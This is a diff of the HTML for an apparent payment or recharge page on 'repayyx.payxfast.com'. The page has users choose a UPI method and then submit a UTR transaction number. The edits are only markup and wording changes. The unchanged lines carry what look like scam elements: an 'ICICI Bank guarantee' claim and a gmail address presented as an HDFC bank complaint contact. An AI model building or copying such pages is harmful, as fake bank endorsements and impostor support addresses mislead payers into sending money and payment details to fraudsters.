--- a/repayyx.payxfast.com/index.html
+++ b/repayyx.payxfast.com/index.html
@@ -27,28 +27,27 @@
                 <td> <h5 align="right">SHIPAN SHIL </h5> </td>
             </td>
         </table>
-        <p class="a1">↓ Select payment method and pay ↓</p><tr>
+        <h3 class="a1">↓ Select payment method and pay ↓</h3><tr>
         <table>
             <tr>
                 <td><input type="radio" class="rdaacls"></td>
                 <td><img src="https://i.ibb.co.com/K9cN6NJ/IMG-3882.png" alt="IMG-3882" width="42px" height="20px" class="gtwImgs"></td>
             </tr>
-            <tr>
+            <br>
                 <td><input type="radio" class="rdaacls"></td>
                 <td><img src="https://i.ibb.co.com/dtpd8d8/IMG-3881.png" alt="IMG-3881" width="66px" height="20px" class="gtwImgs"></td>
             </tr>
             <br>
-            <tr>
                 <td><input type="radio" class="rdaacls"></td>
                 <td><img src="https://i.ibb.co.com/1YgNg3b/IMG-3888.png" alt="IMG-3888" width="64px" height="20px" class="gtwImgs"></td>
             </tr>
-            <tr>
+            <br>
                 <td><input type="radio" class="rdaacls"></td>
                 <td><img src="https://i.ibb.co.com/XZyYVF0/IMG-3880.png" alt="IMG-3880" width="56px" height="20px" class="gtwImgs"></td>
             </tr>
         </table>
         <tr>
-        <p class="a1">↓ Fill the UTR numbers after you have done the payment ↓</p>
+        <h3 class="a1">↓ Fill the UTR numbers after you done payment ↓</h3>
         <form method="post" onsubmit="return false;">
             UTR 
             <input type="text" name="utr" id="utrInput" class="inp" placeholder="Input UTR number"><br>
@@ -61,8 +60,8 @@
         <tr>
          <center>
         <h6 style="color: lightgray; font-size: 12px;">Dear customers: please give priority to this channel to recharge! Support UPI account withdrawal! ICICI Bank guarantee! Safe and reliable! If you have any questions, please contact:</h6>
- <p style= "color:blue;font-size:10px;"> hdfcbankcomplaintacceptance@gmail.com</center>
-        </p>
+ <h6 style= "color:blue;font-size:10px;"> hdfcbankcomplaintacceptance@gmail.com</center>
+        </h6>
     </div>
 
     <!-- Modals -->
